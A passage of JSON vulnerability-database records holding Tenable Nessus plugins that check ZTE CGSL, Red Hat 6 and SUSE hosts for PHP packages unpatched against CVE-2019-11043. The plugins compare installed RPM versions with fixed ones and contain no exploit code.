audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"NewStart Carrier Grade Server Linux\", cpu);\n\nflag = 0;\n\npkgs = {\n \"CGSL CORE 5.05\": [\n \"php-5.4.16-46.1.el7_7\",\n \"php-bcmath-5.4.16-46.1.el7_7\",\n \"php-cli-5.4.16-46.1.el7_7\",\n \"php-common-5.4.16-46.1.el7_7\",\n \"php-dba-5.4.16-46.1.el7_7\",\n \"php-debuginfo-5.4.16-46.1.el7_7\",\n \"php-devel-5.4.16-46.1.el7_7\",\n \"php-embedded-5.4.16-46.1.el7_7\",\n \"php-enchant-5.4.16-46.1.el7_7\",\n \"php-fpm-5.4.16-46.1.el7_7\",\n \"php-gd-5.4.16-46.1.el7_7\",\n \"php-intl-5.4.16-46.1.el7_7\",\n \"php-ldap-5.4.16-46.1.el7_7\",\n \"php-mbstring-5.4.16-46.1.el7_7\",\n \"php-mysql-5.4.16-46.1.el7_7\",\n \"php-mysqlnd-5.4.16-46.1.el7_7\",\n \"php-odbc-5.4.16-46.1.el7_7\",\n \"php-pdo-5.4.16-46.1.el7_7\",\n \"php-pgsql-5.4.16-46.1.el7_7\",\n \"php-process-5.4.16-46.1.el7_7\",\n \"php-pspell-5.4.16-46.1.el7_7\",\n \"php-recode-5.4.16-46.1.el7_7\",\n \"php-snmp-5.4.16-46.1.el7_7\",\n \"php-soap-5.4.16-46.1.el7_7\",\n \"php-xml-5.4.16-46.1.el7_7\",\n \"php-xmlrpc-5.4.16-46.1.el7_7\"\n ],\n \"CGSL MAIN 5.05\": [\n \"php-5.4.16-46.1.el7_7\",\n \"php-bcmath-5.4.16-46.1.el7_7\",\n \"php-cli-5.4.16-46.1.el7_7\",\n \"php-common-5.4.16-46.1.el7_7\",\n \"php-dba-5.4.16-46.1.el7_7\",\n \"php-debuginfo-5.4.16-46.1.el7_7\",\n \"php-devel-5.4.16-46.1.el7_7\",\n \"php-embedded-5.4.16-46.1.el7_7\",\n \"php-enchant-5.4.16-46.1.el7_7\",\n \"php-fpm-5.4.16-46.1.el7_7\",\n \"php-gd-5.4.16-46.1.el7_7\",\n \"php-intl-5.4.16-46.1.el7_7\",\n \"php-ldap-5.4.16-46.1.el7_7\",\n \"php-mbstring-5.4.16-46.1.el7_7\",\n \"php-mysql-5.4.16-46.1.el7_7\",\n \"php-mysqlnd-5.4.16-46.1.el7_7\",\n \"php-odbc-5.4.16-46.1.el7_7\",\n \"php-pdo-5.4.16-46.1.el7_7\",\n \"php-pgsql-5.4.16-46.1.el7_7\",\n \"php-process-5.4.16-46.1.el7_7\",\n \"php-pspell-5.4.16-46.1.el7_7\",\n \"php-recode-5.4.16-46.1.el7_7\",\n \"php-snmp-5.4.16-46.1.el7_7\",\n \"php-soap-5.4.16-46.1.el7_7\",\n \"php-xml-5.4.16-46.1.el7_7\",\n \"php-xmlrpc-5.4.16-46.1.el7_7\"\n ]\n};\npkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:\"ZTE \" + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:31:28", "description": "An update for php is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.\n\nSecurity Fix(es) :\n\n* php: underflow in env_path_info in fpm_main.c (CVE-2019-11043)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {}, "published": "2019-11-01T00:00:00", "type": "nessus", "title": "RHEL 6 : php (RHSA-2019:3287)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11043"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:php", "p-cpe:/a:redhat:enterprise_linux:php-bcmath", "p-cpe:/a:redhat:enterprise_linux:php-cli", "p-cpe:/a:redhat:enterprise_linux:php-common", "p-cpe:/a:redhat:enterprise_linux:php-dba", "p-cpe:/a:redhat:enterprise_linux:php-debuginfo", "p-cpe:/a:redhat:enterprise_linux:php-devel", "p-cpe:/a:redhat:enterprise_linux:php-embedded", "p-cpe:/a:redhat:enterprise_linux:php-enchant", "p-cpe:/a:redhat:enterprise_linux:php-fpm", "p-cpe:/a:redhat:enterprise_linux:php-gd", "p-cpe:/a:redhat:enterprise_linux:php-imap", "p-cpe:/a:redhat:enterprise_linux:php-intl", "p-cpe:/a:redhat:enterprise_linux:php-ldap", "p-cpe:/a:redhat:enterprise_linux:php-mbstring", "p-cpe:/a:redhat:enterprise_linux:php-mysql", "p-cpe:/a:redhat:enterprise_linux:php-odbc", "p-cpe:/a:redhat:enterprise_linux:php-pdo", "p-cpe:/a:redhat:enterprise_linux:php-pgsql", "p-cpe:/a:redhat:enterprise_linux:php-process", "p-cpe:/a:redhat:enterprise_linux:php-pspell", "p-cpe:/a:redhat:enterprise_linux:php-recode", "p-cpe:/a:redhat:enterprise_linux:php-snmp", "p-cpe:/a:redhat:enterprise_linux:php-soap", "p-cpe:/a:redhat:enterprise_linux:php-tidy", "p-cpe:/a:redhat:enterprise_linux:php-xml", "p-cpe:/a:redhat:enterprise_linux:php-xmlrpc", "p-cpe:/a:redhat:enterprise_linux:php-zts", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2019-3287.NASL", "href": "https://www.tenable.com/plugins/nessus/130446", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:3287. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(130446);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2019-11043\");\n script_xref(name:\"RHSA\", value:\"2019:3287\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0695\");\n\n script_name(english:\"RHEL 6 : php (RHSA-2019:3287)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for php is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nSecurity Fix(es) :\n\n* php: underflow in env_path_info in fpm_main.c (CVE-2019-11043)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:3287\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-11043\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP-FPM Underflow RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-zts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:3287\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-bcmath-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-bcmath-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-bcmath-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-cli-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-cli-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-cli-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-common-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-common-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-common-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-dba-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-dba-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-dba-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-debuginfo-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-debuginfo-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-debuginfo-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-devel-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-devel-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-devel-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-embedded-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-embedded-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-embedded-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-enchant-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-enchant-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-enchant-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-fpm-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-fpm-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-fpm-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-gd-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-gd-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-gd-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-imap-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-imap-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-imap-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-intl-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-intl-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-intl-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-ldap-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-ldap-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-ldap-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-mbstring-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-mbstring-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-mbstring-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-mysql-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-mysql-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-mysql-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-odbc-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-odbc-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-odbc-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-pdo-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-pdo-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-pdo-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-pgsql-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-pgsql-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-pgsql-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-process-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-process-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-process-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-pspell-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-pspell-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-pspell-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-recode-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-recode-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-recode-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-snmp-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-snmp-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-snmp-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-soap-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-soap-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-soap-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-tidy-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-tidy-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-tidy-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-xml-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-xml-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-xml-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-xmlrpc-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-xmlrpc-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-xmlrpc-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"php-zts-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"php-zts-5.3.3-50.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-zts-5.3.3-50.el6_10\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T14:30:04", "description": "This update for php7 fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2019-11043: Fixed possible remote code execution via env_path_info underflow in fpm_main.c (bsc#1154999).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-10-31T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : php7 (SUSE-SU-2019:2819-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11043"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:apache2-mod_php7", "p-cpe:/a:novell:suse_linux:apache2-mod_php7-debuginfo", "p-cpe:/a:novell:suse_linux:php7", "p-cpe:/a:novell:suse_linux:php7-bcmath", "p-cpe:/a:novell:suse_linux:php7-bcmath-debuginfo", "p-cpe:/a:novell:suse_linux:php7-bz2", "p-cpe:/a:novell:suse_linux:php7-bz2-debuginfo", "p-cpe:/a:novell:suse_linux:php7-calendar", "p-cpe:/a:novell:suse_linux:php7-calendar-debuginfo", "p-cpe:/a:novell:suse_linux:php7-ctype", "p-cpe:/a:novell:suse_linux:php7-ctype-debuginfo", "p-cpe:/a:novell:suse_linux:php7-curl", "p-cpe:/a:novell:suse_linux:php7-curl-debuginfo", "p-cpe:/a:novell:suse_linux:php7-dba", "p-cpe:/a:novell:suse_linux:php7-dba-debuginfo", "p-cpe:/a:novell:suse_linux:php7-debuginfo", "p-cpe:/a:novell:suse_linux:php7-debugsource", "p-cpe:/a:novell:suse_linux:php7-devel", "p-cpe:/a:novell:suse_linux:php7-dom", "p-cpe:/a:novell:suse_linux:php7-dom-debuginfo", "p-cpe:/a:novell:suse_linux:php7-embed", "p-cpe:/a:novell:suse_linux:php7-embed-debuginfo", "p-cpe:/a:novell:suse_linux:php7-enchant", "p-cpe:/a:novell:suse_linux:php7-enchant-debuginfo", "p-cpe:/a:novell:suse_linux:php7-exif", "p-cpe:/a:novell:suse_linux:php7-exif-debuginfo", "p-cpe:/a:novell:suse_linux:php7-fastcgi", "p-cpe:/a:novell:suse_linux:php7-fastcgi-debuginfo", "p-cpe:/a:novell:suse_linux:php7-fileinfo", "p-cpe:/a:novell:suse_linux:php7-fileinfo-debuginfo", "p-cpe:/a:novell:suse_linux:php7-fpm", "p-cpe:/a:novell:suse_linux:php7-fpm-debuginfo", "p-cpe:/a:novell:suse_linux:php7-ftp", "p-cpe:/a:novell:suse_linux:php7-ftp-debuginfo", "p-cpe:/a:novell:suse_linux:php7-gd", "p-cpe:/a:novell:suse_linux:php7-gd-debuginfo", "p-cpe:/a:novell:suse_linux:php7-gettext", "p-cpe:/a:novell:suse_linux:php7-gettext-debuginfo", "p-cpe:/a:novell:suse_linux:php7-gmp", "p-cpe:/a:novell:suse_linux:php7-gmp-debuginfo", "p-cpe:/a:novell:suse_linux:php7-iconv", "p-cpe:/a:novell:suse_linux:php7-iconv-debuginfo", "p-cpe:/a:novell:suse_linux:php7-intl", "p-cpe:/a:novell:suse_linux:php7-intl-debuginfo", "p-cpe:/a:novell:suse_linux:php7-json", "p-cpe:/a:novell:suse_linux:php7-json-debuginfo", "p-cpe:/a:novell:suse_linux:php7-ldap", "p-cpe:/a:novell:suse_linux:php7-ldap-debuginfo", "p-cpe:/a:novell:suse_linux:php7-mbstring", "p-cpe:/a:novell:suse_linux:php7-mbstring-debuginfo", "p-cpe:/a:novell:suse_linux:php7-mysql", "p-cpe:/a:novell:suse_linux:php7-mysql-debuginfo", "p-cpe:/a:novell:suse_linux:php7-odbc", "p-cpe:/a:novell:suse_linux:php7-odbc-debuginfo", "p-cpe:/a:novell:suse_linux:php7-opcache", "p-cpe:/a:novell:suse_linux:php7-opcache-debuginfo", "p-cpe:/a:novell:suse_linux:php7-openssl", "p-cpe:/a:novell:suse_linux:php7-openssl-debuginfo", "p-cpe:/a:novell:suse_linux:php7-pcntl", "p-cpe:/a:novell:suse_linux:php7-pcntl-debuginfo", "p-cpe:/a:novell:suse_linux:php7-pdo", "p-cpe:/a:novell:suse_linux:php7-pdo-debuginfo", "p-cpe:/a:novell:suse_linux:php7-pgsql", "p-cpe:/a:novell:suse_linux:php7-pgsql-debuginfo", "p-cpe:/a:novell:suse_linux:php7-phar", "p-cpe:/a:novell:suse_linux:php7-phar-debuginfo", "p-cpe:/a:novell:suse_linux:php7-posix", "p-cpe:/a:novell:suse_linux:php7-posix-debuginfo", "p-cpe:/a:novell:suse_linux:php7-readline", "p-cpe:/a:novell:suse_linux:php7-readline-debuginfo", "p-cpe:/a:novell:suse_linux:php7-shmop", "p-cpe:/a:novell:suse_linux:php7-shmop-debuginfo", "p-cpe:/a:novell:suse_linux:php7-snmp", "p-cpe:/a:novell:suse_linux:php7-snmp-debuginfo", 